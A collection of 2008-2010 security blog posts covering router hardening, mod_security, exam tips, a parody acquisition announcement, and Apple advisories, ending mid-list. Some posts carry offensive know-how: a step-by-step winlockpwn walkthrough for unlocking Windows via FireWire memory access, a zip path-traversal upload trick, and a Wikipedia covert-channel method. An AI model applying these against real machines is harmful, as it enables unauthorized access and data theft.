PaulDotCom Community Blog

Flash drive with fake Facebook login...

2010-05-06T12:36:00.000-07:00

I find myself thinking "does anyone fall for this stuff?" Well, obviously the answer to that is "YES!!" Uh, yeah, don't just use something because someone tells you. People, wake up, this stuff isn't real!!! :-)

Sunbelt Blog: Facebook Remote Login + Flash drive = stolen credentials

Chris Shameless plug: LABrat.com

Writing Snort Rules is harder than it looks

2010-02-22T17:45:00.000-08:00

Rather than reposting the entire article here, I'd prefer to just link to it:

http://blog.joelesler.net/2010/02/writing-snort-rules-is-harder-than-it-looks.html

This post took me a couple hours to write, and I try and illustrate how to take a Snort rule and really take your time when writing it in order to get it right. Understanding the Snort syntax is a huge undertaking, but well worth your time once you get it right.

Identifying Garbage Men

2008-12-13T05:24:00.000-08:00

Tis the season for tipping garbage men. Here in Brussels, at the end of the year, garbage men would ring your doorbell during their round, presenting you their best wishes for the new year.

This tradition came to an end several years ago. Nowadays, they present you their best wishes when they're off-duty. And in came a new ID problem...

Identifying garbage men at work is quite easy and rather fool-proof. The work-clothing they wear and their activity (filling the garbage truck with your garbage) is a good give-away. Would-be impostors face a rather high cost (obtaining a garbage truck, even stealing one comes with a cost) to impersonate garbage men at work.

Reliably identifying off-duty garbage men is a bigger problem. As you've only their (work-) clothes and verbal claims as evidence to help you in distinguishing real garbage men from impostors, your rate of false positives increases. As the cost of obtaining work-clothes to fool you will probably be outweighed by the amount of collected tips, impostors stand a chance to make a profit, and hence the probability of fake garbage men ringing your doorbell increases.

But is this really your problem? From an economics point of view: no!
Let's assume you tipped an impostor, and a few days later, a real garbage man rings your doorbell. Will you tip him too? I know here in Brussels, a substantial group of people won't. Because you're still facing the same identification problem (is this a real garbage men?), but this time, you're more suspicious. So your rate of false negatives increases.
And your risk of receiving bad service for not tipping the genuine garbage men is rather low. The real garbage men might be disgruntled, but then again, most realize that it's not that you don't want to tip garbage men in general, it's just that they were impersonated.

To summarize: genuine garbage man face an economic loss from the activity of impostors, you don't. Hence the ID problem is really the garbage men's problem, not yours.

The solution the garbage men in Brussels adopted is to deposit some form of photo ID for garbage men in your mailbox, weeks before the tipping occurs. This document will assist you in distinguishing the real from the fake.

I invite you to post comments with ways to improve or break their system.

Somewhere I'm tempted to alter this "photo ID" (i.e. replacing the pictures), and challenge the first garbage man ringing my doorbell. I picture me saying: "Ja mo kadeike, a foto stoet e ni op!" (as Google translate doesn't support Brussels dialect yet, let me translate loosely: "Hey kid, your picture doesn't match!"). But then again, it's the season to be merry, and I'm a satisfied customer, so I won't be a jerk.

Securing Cisco Routers the Easy Way

2008-10-03T16:24:00.001-07:00

After hearing about Fyodor's scanning the Internet project, I started thinking about what he found...My reaction was much the same as Paul's...Telnet??? Really? Then I started thinking about the work I did back in the day when I was dangerously unqualified to do my job and had no idea what I was doing, and how many Cisco routers I left telnet open on the WAN interface simply for convenience. Over the years, I've found most consulting companies do this without telling the customer, and if you're using an outside vendor to manage your Cisco gear, I would check! Having had to do quite a bit of router securing lately, I thought this would be a good time to cover some really simple ways to secure your routers for the non-Cisco guys out there, other than the obvious firmware updates and such. All of these methods should work on the more recent versions of the IOS. This post will cover some very basic router security methods. There is a real science to securing Cisco IOS devices, and it's certainly possible to make your router security scheme very complex, but hopefully this gives you a good starting point if you're not already doing these things.

Adding Local Users
One of the simplest ways to lock down your Cisco gear is by adding a local authentication database to your router. This is something that Cisco simply doesn't stress enough. Even if you go through their CCNA training, they teach you there's a password to log in (telnet, console, etc.) and the enable password, both of which are subject to brute forcing...But think about how much more secure your gear is if an attacker has to guess both a username and a password. It would certainly render brute forcing impossible. Here's a simple example:

Larry(config)#aaa new-model
Larry(config)#username Larry privilege 15 password beer
Larry(config)#aaa authentication login default local

Looking at what we did, we first enabled authentication, authorization, and accounting services on our router. We then created a user named Larry with a password of beer that has a privilege level of 15. We then set the default login method for all management on the router to use the local database (i.e. usernames and passwords we create on the router itself). Now when telnetting in, connecting via a console cable, SSH, whatever, the user must present two sets of credentials. Of course if you make the username admin, cisco, etc. then this isn't a whole lot better, but using an uncommon username and password helps. You can do a lot more with creating limited privilege user accounts, custom views, authenticating and authorizing command execution via TACACS+ and RADIUS, and password policies but that's beyond the scope of this post.

Enabling SSH
Solving the problem of telnet's plain text transmission is actually quite simple. Before starting make sure you are on IOS version 12.1(19)E because that's the first revision that supports SSHv2. Enabling SSH on a router requires two lines:

Larry(config)#ip domain-name pauldotcom.com
Larry(config)#crypto key generate rsa modulus 1024 general-keys
The name for the keys will be: Larry.pauldotcom.com
% The key modulus size is 1024 bits% Generating 1024 bit RSA keys, keys will be non-exportable...[OK]
Larry(config)#*Mar 1 00:19:52.391: %SSH-5-ENABLED: SSH 1.99 has been enabled

First we have to specify a domain name using the ip domain-name command so our router has an FQDN, then generate our keys. You can specify whatever key size you want (I used 1024 in the above example). After that SSH is automatically turned on for you. To get rid of telnet management completely, we have to do one more thing:

Larry(config)#line vty 0 4
Larry(config-line)#transport input ssh

Router Auto Secure
Cisco routers have lots of services running on them, most of them totally useless. Cisco has now provided an easy way to disable these services and enhance the security of your router in a number of ways with one command. Also if you use Cisco Secure Device Manager (SDM) for router management, it features a security audit tool and a one click lockdown tool for disabling these services. I'm still a console guy though, so I like this method. Look at how much useless stuff is turned off just after the first step, and how much you get by running one simple command:

Larry#auto secure
Is this router connected to internet? [no]:
Securing Management plane services...
Disabling service finger
Disabling service pad
Disabling udp & tcp small servers
Enabling service password encryption
Enabling service tcp-keepalives-in
Enabling service tcp-keepalives-out
Disabling the cdp protocol
Disabling the bootp server
Disabling the http server
Disabling the finger service
Disabling source routing
Disabling gratuitous arp

Finger? Come on. There wizard does a lot more, allowing you to set your login banner (and providing a pretty scary default one), configure an enable secret, set up blocking periods when login attacks are detected, and enabling the CBAC firewall.

So there you have it. I hope this was interesting, and be sure to find me lurking around #pauldotcom if you have any questions or comments.

Installing The mod_security Module for Apache on Ubuntu

2008-09-30T21:37:00.000-07:00

What is mod_security?

Mod_security is a filter for requests and responses sent to and from an Apache web server. It is the "snort" of web applications.

As an example, lets say "super haxor," starts up their kiddie "Auto Haxs 4000" script and begins to pummel your web server with every known vulnerability for every known web application - perhaps even vulnerabilities that are not known the public. As mod_security parses each request to your web server, it matches super haxor's requests to patterns that indicate attempts to exploit SQL injections, command injections, XSS attacks, etc. and it displays a generic error message. The attack attempts from super haxor never touch your web application.

In another scenario, Paul and Larry are doing a penetration test on your web server. They find a page that produces a 404 error, hoping to get the details of the operating system and web server in order to gather information about the box. As the response is returned to Paul and Larry, mod_security matches the server information in the response and changes it to a generic, administrator defined message.

Obviously mod_security adds another layer of protection to your web server and the applications it hosts in keeping with pauldotcom.com's "defense in depth" mantra.

How do I install mod_security?

This guide covers installing mod_security on Ubuntu 7.10 for Apache 2. Since there is no package for mod_security in Ubuntu due to licensing issues, and we have to install it from source.

Use the Source, Luke

Download the latest mod security tars from the mod_security site. http://www.modsecurity.org/download/direct.html . You will only need the current modsecurity-apache archive.

Now get the necessary packages for compiling mod_security on Ubuntu with this command:
sudo apt-get install automake g++ apache2-threaded-dev \ dpkg-dev libxml2 libxml2-dev
Now compile and install mod_security with the following commands:
cd <modsecurity download directory>/apache2 ./configure make sudo make install
Apache Conf Files

Now that the mod_security binary is installed in your Apache 2 modules folder, we have to make a few configuration files so that Apache knows to use the module.

Create a file called /etc/apache2/mods-available/security2.load with the following contents:
LoadFile /usr/lib/libxml2.so LoadModule security2_module /usr/lib/apache2/modules/mod_security2.so <IfModule !mod_security2.c> error_mod_security2_is_not_loaded </IfModule> <IfModule mod_security2.c> Include /etc/apache2/modsecurity_crs/*.conf </IfModule>
Next create a /etc/apache2/modsecurity_crs directory and move all of the Core Rules into it.
sudo mkdir /etc/apache2/modsecurity_crs sudo cp -R <mod_security download directory> \ /rules/*.conf /etc/apache2/modsecurity_crs/
You should now take a look at the rule files to make sure the settings are as you like them. For the most part I only modified lines in the modsecurity_crs_10_config.conf file. This file will allow you to enable different portions of the engine. I enabled the directives to scan all XML content. In particular you will want to look at the paths that mod_security stores its log files. I changed all of the log directories to the following:
SecUploadDir /var/log/modsecurity/SecUploadDir SecAuditLog /var/log/modsecurity/SecAuditLog/modsec_audit.log SecAuditLogStorageDir /var/log/modsecurity/SecAuditLogStorageDir SecDebugLog /var/log/modsecurity/SecDebugLog/modsec_debug.log SecDataDir /var/log/modsecurity/SecDataDir SecTmpDir /var/log/modsecurity/SecTmpDir
After the settings were made I created the directories and set proper permissions with the following commands:
sudo mkdir /var/log/modsecurity sudo mkdir /var/log/modsecurity/SecDataDir sudo mkdir /var/log/modsecurity/SecTmpDir sudo mkdir /var/log/modsecurity/SecUploadDir sudo mkdir /var/log/modsecurity/SecAuditLog sudo mkdir /var/log/modsecurity/SecAuditLogStorageDir sudo mkdir /var/log/modsecurity/SecDebugLog sudo chown -R www-data:www-data /var/log/modsecurity sudo chmod -R a-rwx /var/log/modsecurity/ sudo chmod -R u+rwx /var/log/modsecurity/
I also had some trouble using mod_security with my Drupal installation. Mod_security was rejecting the application/xml request type, so I added "application/xml" to the regular expression in modsecurity_crs_30_http_policy.conf on line 72. It now looks like this:
:SecRule REQUEST_HEADERS:Content-Type "!(?:^(?:application\/x-www-form-urlencoded(?:;(?:\s?charset\s?=\s?[\w\d\-]{1,18})?)??$|multipart/form-data;)|text/xml|application/xml)"
There are also some other rule sets in the modsecurity-apache_2.1.5/rules/optional_rules/ directory. You may want to take a look at them and place them into your /etc/apache2/modsecurity_crs/ if desired.

Enable and Test

You should now have everything in place to run Apache 2 with mod_security. It is time to enable the module and restart apache.
sudo a2enmod security2 sudo /etc/init.d/apache2 reload
Hopefully Apache 2 restarts fine with no errors. Once Apache 2 has restarted, go ahead and test your web application with mod_security enabled. If you find that your web application is now working improperly, you can debug the mod_security rule that is blocking it by taking a look at the audit log and using the fabulous web application debugging tool Firebug.

Conclusion

If you are deploying an Apache 2 server that is going to be running any sort of web application, I highly recommend that you take a look at mod_security. The hour you spend installing it could save you from a lawsuit or embarrassing explanations to your customers.

(Blog wakeup call) Tip of the Moment: Zip Traversal

2008-07-02T07:46:00.000-07:00

Well I didn't think this was worth a post before, but its been ages since the last post, so its about time something got stuck up here. So I bring you my handy tip of the moment: Zip traversal.

Sometimes you come across a system that allows upload in zip format to save bandwidth. The zip file is then decompressed by the system after upload. Anywhere there's file upload should get your arbitrary file upload senses tingling, but unfortunately it (hopefully) does the same to developers. The upload destination folder may not allow execution, have any mappings to run web scripts or may be outside of the webroot if a website is being targeted.

But depending how the unzip routine used by the application works, there may yet be a way to upload files to arbitrary locations. By editing a zip file to give certain files in the archive names that start with a series of "../" you can traverse back up to the root of the file system and then specify whatever path you feel like. This can be done, for example, by zipping a file with a long file name and editing the zip file in a hex editor, changing the extra letters of the file name to ../ as needed.

This of course depends on the local file permissions and the user the unzipping process runs under. It also depends if the unzip algorithm detects the dangerous behaviour or allows it, as some background unzipping processes do.

So there it is, my tip of the moment. Nothing impressive, but kind of nifty. And maybe we will wake up some other bloggers :)

Taking the GSSP-C Exam

2008-04-19T02:38:00.000-07:00

On a sunny day in March, I strolled through the Begijnhof in Leuven, Belgium (pictures here). My destination was a nice medieval house where I would take the GSSP-C exam (GIAC Secure Software Programmer - C).

This exam is not your usual SANS exam, it's a proctored paper exam, containing 100 multiple-choice questions and has a six hour time limit. Unlike other GIAC certifications, this exam is not offered online and is not open book. The GSSP certification exam is only offered at specific locations given on a number of dates through the year. This time, SANS teamed up with secappdev to organize this exam in Belgium (I believe it was the first time this exam was organized in Europe). Proctor was Pieter Danhieux (GSE).

You have to be fluent in C to attempt this exam (I believe I wrote my first C program in 1984), because a lot of the questions will be code listings where you have to identify errors. The SANS C-handbook has sample questions that give a good idea what to expect. And if you just learned to program in C, you might be able to answer many questions, but I highly doubt you'll manage to provide enough correct answers in the allotted time limit.

Brush up your knowledge of the basic C I/O functions: what is their signature, how do they behave? Trust me, you'll need this during the exam (remember, this exam is not open book).

Read a couple of the recommended books, like Exploiting Software: How to Break Code and Writing Secure Code, Second Edition.

Be prepared for some really hard puzzles, I remember one question where I would have overlooked the error in the C program. It's only because I new the program was faulty, that I persevered and found the f*ing bug!

Another hurdle is the exam format. Tackling 100 questions in 6 hours and transcribing 100 answers correctly with a number 2 pencil on a form is not so trivial. I followed the same strategy I successfully applied during my CISSP exam. Here is my recipe:

I read the first question. If I don’t understand the question, or if I don’t like the question, or if I even don’t feel like answering the question right now, I just move on to the next question. However, even if I skip a question but I’m certain that one or more of the answers are not correct, I cross them out (every time I tell I write something down or make a mark, I do it on the question booklet, unless stated otherwise).

If I try to answer the question but I’m not sure of the right answer, I will cross out the incorrect answers and move on to the next question.
If I answer a question I’m sure about, I put a circle around the number of the question and another one around the letter of the correct answer.

After tackling the last question, I just start the process again from the beginning, skipping the questions I already answered (remember, there’s a circle around the number of an answered question). I repeat this process several times, each cycle gives me more answers. After a couple of hours, I’ve answered about 80% of the questions and I decide to transcribe my answers to the form (I have to be careful to skip the unanswered questions on the form). I review each answered question and transcribe the correct answer to the form. At the same time, I compile a list of all unanswered questions.
I decided to transcribe the answers after completing about 80% because:
1) I want to take the time to correctly transcribe the answers, I don’t want to make mistakes by rushing the job at the end of the 6 hour period allowed for the exam
2) I don’t want to start second-guessing my answers

After 30 minutes, I’ve transcribed all answered questions.

Now I focus on the list of remaining questions. I try to answer each question by eliminating all incorrect answers: what remains must be the correct answer. If more than one answer remains, I select one at random. I start guessing because I don’t want to stay until the end of the exam trying to find the correct answers, I feel confident because of all the other questions I answered. Since a wrong answer does not negatively impact your score, you’re better of answering all questions than leaving some unanswered. The main reason why I tackle the remaining questions like this, is that I don't want to start second-guessing my answers to the questions I felt confident about. Trust me, if you spend too much time toiling over a question where you're clueless, you'll start to doubt everything.

Finally, I transcribe the remaining answers to the form. The list of remaining questions I compiled helps me to identify which answers remain to be transcribed.

It's the first certification exam I really enjoyed, I had fun reviewing all that C code, it's a bit like discovering vulnerabilities.

Six weeks later, I got my detailed score report from SANS. Did I pass? I'll leave you too in suspense, for a couple of seconds...

http://www.giac.org/certified_professionals/listing/gssp-c.php

Running Backtrack in VirtualBox

2008-04-11T02:11:00.000-07:00

Seeing as I've just spent the morning trying to get all this up and running I thought I'd create an entry about how to get Backtrack running in VirtualBox.

For those who haven't heard of it, VirtualBox is an open source equivalent to vmware workstation. It does full snapshoting (unlike vmware server) and seems to have a very active support community.

The setup I wanted was for the virtual machine to have its own IP address and full network access. The default setup for VirtualBox is to have NAT based networking so I had to do a bit of work to get full "Host Interface" mode. Unlike vmware, VirtualBox doesn't do all the networking itself you have to do the initial setup yourself. This is done by using tun/tap and bridging. The instructions here work on Arch but should be generic enough for any distro. The install guide has detailed instructions for debian/ubuntu, redhat and suse.

First you need to install uml_utilities and bridge-utils, in Arch:

pacman -S uml_utilities bridge-utils

You then create a bridge and add your main interface to it:

brctl addbr br0
ifconfig eth0 0.0.0.0
brctl addif br0 eth0
ifconfig br0 up

The IP address normally assigned to eth0 now needs to be assigned to br0, so either bring up your dhcp client or hardcode the IP using ifconfig. If you are using ifconfig remember to setup your default route. Also remember to kill any dhcp clients working for eth0.

Next is creating the tun/tap interface. First check if you have the tun module loaded:

lsmod|grep tun

and if not load it:

modprobe tun

The virtual machine is going to get its own interface, this can be named whatever you want, I call mine vbox0. To create it:

tunctl -t vbox0 -u robin

this then needs adding to the bridge:

brctl addif br0 vbox0

and, the bit I missed for a while, brining up:

ifconfig vbox0 up

You also need to check that the device (/dev/net/tun) is accessible by the user who is going to use it. I did this by creating a new vboxusers group, adding myself to it then making sure that the group could read and write from the device:

groupadd vboxuser
usermod -a -G vboxuser robin
chgrp vboxusers /dev/net/tun
chmod g+rw /dev/net/tun

You should now have a working virtual interface.

VirtualBox has a fairly simple GUI for creating new machines so I won't talk through that in detail. Basically, click the create a new machine button, set the memory size and if you want to have a drive for the machine, set that up here as well.

Once you've setup the machine it will appear in the left hand list of available machines. Right click on it and chose settings. Chose Network and change the "Attached to" option to "Host Interface". In the "Interface Name" section at the bottom enter vbox0 (or whatever you called it above).

Next go to the "cd/dvd-rom" section and chose "mount cd/dvd drive" and specify where your backtrack CD id, either ISO or physical location. Click OK and you're done.

Start the machine, it should boot as normal and once up and running should try to get an IP address through dhcp, if you haven't got dhcp you will need to setup the IP manually.

All of this information is available in the VirtualBox manual but I found that some of the scripts it referred to didn't exist or didn't work quite as expected. I also prefer to set this kind of thing up by hand, at least the first few times so that I really know what is going on, once I'm happy then I'll look at scripting it.

Any problems, questions or corrections, let me know.

Cisco Acquires Sguil!!

2008-04-01T06:27:00.000-07:00

In many of my past writings I have mentioned using Sguil on my personal blog and have been an avid user of the solution. On that front, I would like to extend my congratulations to the core members of the team for their great success! It will be exciting to see it running on IOS!

Cisco Announces Agreement to Acquire Sguil™ Open Source Security Monitoring Project

Acquisition Furthers Cisco’s Vision for Integrated Security Products

SAN JOSE, Calif., and LONGMONT, Color., April 1st, 2008 – Cisco and the Sguil™ project today announced an agreement for Cisco to acquire the Sguil™ project, a leading Open Source network security solution. With hundreds of installations world-wide, Sguil™ is the de facto reference implementation for the Network Security Monitoring (NSM) model. Sguil™-based NSM will enable Cisco’s customer base to more efficiently collect and analyze security-related information as it traverses their enterprise networks. This acquisition will help Cisco to cement its reputation as a leader in the Open Source movement while at the same time furthering its long-held vision of integrating security into the network infrastructure.

Under terms of the transaction, Cisco has acquired the Sguil™ project and related trademarks, as well as the copyrights held by the five principal members of the Sguil™ team, including project founder Robert "Bamm" Visscher. Cisco will assume control of the open source Sguil™ project including the Sguil.net domain, web site and web site content and the Sguil™ Sourceforge project page. In addition, the Sguil™ team will remain dedicated to the project as Cisco employees, continuing their management of the project on a day-to-day basis.

To date, Sguil™ has been developed primarily in the Tcl scripting language, support for which is already present inside many of Cisco’s routers and switches. The new product, to be known as “Cisco Embedded Monitoring Solution (CEMS)”, will be made available first in Cisco’s carrier-grade products in 3Q08, with support being phased into the rest of the Cisco product line by 4Q09. Linksys-branded device will follow thereafter, though the exact deployment schedule has yet to be announced.

“We’re extremely pleased to announce this deal,” said Cisco’s Chief Security Product Manager Cletus F. Simmons. “For some time, our customers have told us that our existing security monitoring products did not extend far enough into their network infrastructure layer. Not only was it sometimes difficult to intercept and monitor the traffic, but there were often political problems at the customer site with deploying our Intrusion Detection Systems, as management had heard several years ago that they ere ‘dead’. Now, with Sguil™ integrated into all their network devices, they’ll have no choice!”

Although the financial details of the agreement have not been announced, Sguil™ developer Robert Visscher will become the new VP of Cisco Rapid Analysis Products for Security. “This deal means a lot to the Sguil™ project and to me personally,” Visscher explains. “Previously, we had to be content with simply being the best technical solution to enable intrusion analysts to collect and analyze large amounts of data in an extraordinarily efficient manner. But now, we’ll have the additional advantage of the world’s largest manufacturer of networking gear shoving it down their customers’ throats! We will no longer have to concern ourselves with mere technical excellence. Instead, I can worry more about which tropical island to visit next, and which flavor daiquiri to order. You know, the important things.”

About Cisco Systems

Cisco, (NASDAQ: CSCO), is the worldwide leader in networking that transforms how people connect, communicate and collaborate. Information about Cisco can be found at http://www.cisco.com. For ongoing news, please go to http://newsroom.cisco.com.

About Sguil™

Sguil™ is the leading Network Security Monitoring (NSM) framework. It is built for network security analysts by network security analysts. Sguil’s main component is an intuitive GUI that provides access to a wide variety of security related information, including real-time IDS alerts, network session database and full packet captures. Sguil™ was written by Robert “Bamm” Visscher, who was apparently too cheap to buy a book on Java or C.

Again, congrats to the team... if you get a chance, please stop in at #snort-gui on freenode and say hi / congratulate the team.

Cheers,
enhanced

2008-03-31T07:07:00.000-07:00

It seems that each time I attend Black Hat, I get some new steganography idea.

It's easy to hide data inside the Wikipedia pages. But before I explain how, understand that the general principle of what I will explain applies to most sites where users can edit content. They can all be used as a covert channel, but Wikipedia has become so common that it would have passed under my radar when performing a forensic investigation. But not anymore.

You can use the Wikipedia Sandbox to experiment while avoiding the wrath of the Wiki gods.

Select the edit this page tab to start editing the article:

Prepare the data you want to store on Wikipedia by converting it to a base64 representation (you can ZIP and/or encrypt it before converting it to base64). Insert the base64 data as a hidden comment inside the page:

Save your changes first, and then undo your changes via the history tab:

That's it! From now on, you can retrieve your data by comparing versions:

So how can you detect and prevent this? Disclosure: my analysis is based on observations of the HTTP traffic generated by a browser connecting to Wikipedia, and not by analyzing the MediaWiki software.

Normal Wikipedia requests (browsing the articles) are GET http requests to the wikipedia.org server. Editing a page is done with a POST http request:

So to detect a user updating a Wikipedia page, look for POST requests to Wikipedia. But there are exceptions to this rule. First, previews also use a POST request:

You'll have to look inside the posted form data to differentiate a save from a preview:

Another exception is a user login:

To differentiate these, use the action parameter. It's submit for article updates and submitlogin for a user login.

You can use these criteria (POST request, form data, action parameter) to block edits to the Wikipedia site via a filtering proxy. Of course, this detects and blocks all updates, not only updates to exfiltrate data.

Didier Stevens
https://DidierStevens.com

How To: winlockpwn

2008-03-26T07:49:00.000-07:00

winlockpwn is a memory analysis tool released by Adam Boileau of storm.net.nz. This utility exploits firewire's direct memory access. The operating system allows firewire devices to directly read/write memory without having to go through the processor. Sounds handy right? I installed winlockpwn on Ubuntu 7.10 and a fully patched Windows XP SP2 box. The first step is to download the required libraries:

sudo aptitude install libdc1394-13 libraw1394-dev swig python

Now we need to download and install Python 2.3 because I tried to run it using Python 2.5 with no success:

wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar -zxvf Python-2.3.6.tgz
cd Python-2.3.6
./configure
make
sudo make install

The next step is to modify libraw1394:

sudo vim /usr/include/libraw1394/raw1394.h

At this point go ahead and search for “__attribute__((deprecated));” in the file raw1394.h and comment out every line that contains it. Hint: don't forget to end the line above it with a semi-colon. Once you comment all of them out, save and close the file. The next step is to get the pythonraw1394 library. It contains the python bindings for libraw1394, romtool, and businfo from Adam’s site.

wget http://www.storm.net.nz/static/files/pythonraw1394-1.0.tar.gz

And of course, we need to untar it

tar -zxvf pythonraw1394-1.0.tar.gz

Now we need to go into the untared directory and download the actual winlockpwn script:

cd pythonraw1394
wget http://www.storm.net.nz/static/files/winlockpwn

The winlockpwn script needs to be in the pythonraw1394 directory or it wont work without modifying the code. Also, we need to make it executable:

chmod +x winlockpwn

Now we also need to edit the Makefile for pythonraw1394 to point it to python 2.3's include directory:

sudo vim Makefile

Now change /usr/include/python2.3 to /usr/local/include/python2.3 on lines 5 and 6. Again, save and quit and compile it with the following command:

sudo make

The raw1394 module also needs to also be loaded and the permissions changed on the raw1394 devices:

sudo modprobe raw1394
sudo chmod 666 /dev/raw1394

Now we need to plug into the windows machine and then edit the romtool to reflect the location of python:

sudo vim romtool

Change #!/usr/bin/python to #!/usr/local/bin/python on the first line one of the file.
Repeat the same step for the winlockpwn script as well.
And then load the ipod image onto the firewire port.

./romtool -s 0 ipod.csr

Loading the ipod image onto the firewire port basically fools windows into thinking your linux box is an ipod.
Now we can run businfo to make sure the ipod image is loaded and on what port number it is on as well as making sure you can see your computer on the other end. Mine showed the ipod image loaded onto port number 0 and my windows box on node number 1.
Now, the fun part! Run winlockpwn
as follows:

winlockpwn port node target

Mine looked like this:

./winlockpwn 0 1 1

Once you run winlockpwn, the windows box will accept any password you choose to give it (even a blank password) and unlock the system for you.

There are many security issues that arise from winlockpwn. What is to stop one of the janitorial staff from getting into the CEO's office after hours and immediately getting access to his box because all he did was lock it before he went home? It just goes to show that once someone gains physical access, game over.

---
Danny Howerton
http://metacortexsecurity.com

FAIL: When software tries to be smrt, and sysadmins trust it.

2008-03-25T19:54:00.000-07:00

I run servers for a living... lots of severs, for all sorts of people and customers and workloads. Nothing homogeneous or even enterprisey about most of it.

Probably a year ago, I noticed one of my client's webserver VPS instances was spewing mail like an open relay. Some quick checking indicated this wasn't the case, and it wasn't listed on any RBLs either, so I assumed that some random PHP script was easily pwn3d. Since the client didn't care about email at all (sigh, why'd you have me turn it on?!), I just shutdown postfix, saw all the SMTP traffic stop and left it to the client to figure out, since they didn't see fit to have me dig deeper into it, nor could I justify doing it in the absence of financing.

Fast-forward to last week, when said client needed mail turned on. I hesitated and explained why I was reluctant to do this. They assured me that everything had been updated and most of the PHP stuff is gone, aside from a bleeding-edge instance of Wordpress. Okay, that's legit.

I review the config, trash the mail-queue just in case, and fire up postfix.

Nothing (bad) happens instantly, I make note to check it in the morning.

Everything's okay for the rest of the week, 10msg/day, normal email traffic flow for this client

Yesterday morning though, I notice 7412msg/hr being queued. Eeep.

Killing apache seems to have no effect on the flow.

Reviewing mailq shows it's all spam or backscatter. Sigh.
I fix the backscatter problem (shame on me), postfix reload, and then just to be sure, do 'postconf -n' - and everything looks okay there too.
I continue auditing things running on the machine and don't see anything out of the ordinary, and yet postfix continues happily to queue spam.
More rummaging turns up nothing other than postfix being the problem.

And then I found it.

[root@bukkit ~]# postconf | grep mynet
mynetworks = 66/8
mynetworks_style = subnet
...
[root@bukkit ~]#

Postfix made a mistake. An ugly one. So ugly, it allowed 1/256th of the IPv4 Internet relay mail via this server, with impunity.

But it was a minor error, one all sysadmins have made in their careers...

It got the subnet mask wrong.

Now, I'm not 100% certain of why this happens, but thanks to the default subnet mask for Class-A networks of which my allocation is part of, it had a flashback to the 1980s and defaulted to a /8.

And since this parameter defaults to being derived at start-time, it doesn't show up in 'postconf -n', which only shows non-defaulted configuration parameters.

Lesson: Don't trust your software to auto-configure properly every time, and when you're auditing configurations - check everything, not just non-default settings.

I've checked all the other machines I'm responsible for, and haven't seen this happening, so I'll be updating this postfix to a later version soon, but at least I've hardcoded mynetworks for now.

With apologies to the unintended victims, and the rest of the Internet, for making the spam problem worse - not better.

Mea Cupla.

Apple posts update 2008-0002

2008-03-18T18:41:00.000-07:00

Apple just posted Apple Security Update 2008-0002. Here's the news, updates for both Leopard and Tiger:

Security Update 2008-002

AFP Client

CVE-ID: CVE-2008-0044

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Accessing a maliciously crafted afp:// URL may lead to an application termination or arbitrary code execution

Description: Multiple stack buffer overflow issues exist in AFP Client's handling of afp:// URLs. By enticing a user to connect to a malicious AFP Server, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issues through improved bounds checking.

AFP Server

CVE-ID: CVE-2008-0045

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Cross-realm authentication with AFP Server may be bypassed

Description: An implementation issue exists in AFP Server's check of Kerberos principal realm names. This may allow unauthorized connections to the server, when cross-realm authentication with AFP Server is used. This update addresses the issue by through improved checks of Kerberos principal realm names. This issue does not affect systems running Mac OS X v10.5 or later. Credit to Ragnar Sundblad of KTH - Royal Institute of Technology, Stockholm, Sweden for reporting this issue.

Apache

CVE-ID: CVE-2005-3352, CVE-2006-3747, CVE-2007-3847, CVE-2007-5000, CVE-2007-6388

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in Apache 1.3.33 and 1.3.39

Description: Apache is updated to version 1.3.41 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the Apache web site at http://httpd.apache.org For Mac OS X v10.5, Apache version 1.3.x is only shipped on Server configurations. mod_ssl is also updated from version 2.8.24 to 2.8.31 to match the upgraded Apache; no security fixes are included in the update.

Apache

CVE-ID: CVE-2007-5000, CVE-2007-6203, CVE-2007-6388, CVE-2007-6421, CVE-2008-0005

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in Apache 2.2.6

Description: Apache is updated to version 2.2.8 to address several vulnerabilities, the most serious of which may lead to cross-site scripting. Further information is available via the Apache web site at http://httpd.apache.org

AppKit

CVE-ID: CVE-2008-0048

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Usage of the NSDocument API to may lead to arbitrary code execution

Description: A stack buffer overflow exists in the NSDocument API's handling of file names. On most file systems, this issue is not exploitable. This update addresses the issue through improved bounds checking. This issue does not affect systems running Mac OS X v10.5 or later.

AppKit

CVE-ID: CVE-2008-0049

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: A local user may be able to execute arbitrary code with system privileges

Description: A mach port in NSApplication intended for inter-thread synchronization is unintentionally available for inter-process communication. By sending maliciously crafted messages to privileged applications in the same bootstrap namespace, a local user may cause arbitrary code execution with the privileges of the target application. This update addresses the issue by removing the mach port in question and using another method to synchronize. This issue does not affect systems running Mac OS X v10.5 or later.

AppKit

CVE-ID: CVE-2008-0057

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Visiting a maliciously crafted website may lead to arbitrary code execution

Description: Multiple integer overflow vulnerabilities exist in the parser for a legacy serialization format. By causing a maliciously formatted serialized property list to be parsed, an attacker could trigger a heap-based buffer overflow which may lead to arbitrary code execution. This update addresses the issue by performing additional validation of serialized input. This issue does not affect systems running Mac OS X v10.5 or later.

AppKit

CVE-ID: CVE-2008-0997

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Querying a network printer may cause an unexpected application termination or arbitrary code execution

Description: A stack based buffer overflow exists in AppKit's handling of PPD files. By enticing a user to query a network printer, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue through improved handling of PPD files. This issue does not affect systems running Mac OS X v10.5 or later.

Application Firewall

CVE-ID: CVE-2008-0046

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: The German translation of the Application Firewall preference pane was misleading

Description: The "Set access for specific services and applications" radio button of the Application Firewall preference pane was translated into German as "Zugriff auf bestimmte Dienste und Programme festlegen", which is "Set access to specific services and applications". This might lead a user to believe that the listed services were the only ones that would be permitted to accept incoming connections. This update addresses the issue by changing the German text to semantically match the English text. This issue does not affect systems prior to Mac OS X v10.5.

CFNetwork

CVE-ID: CVE-2008-0050

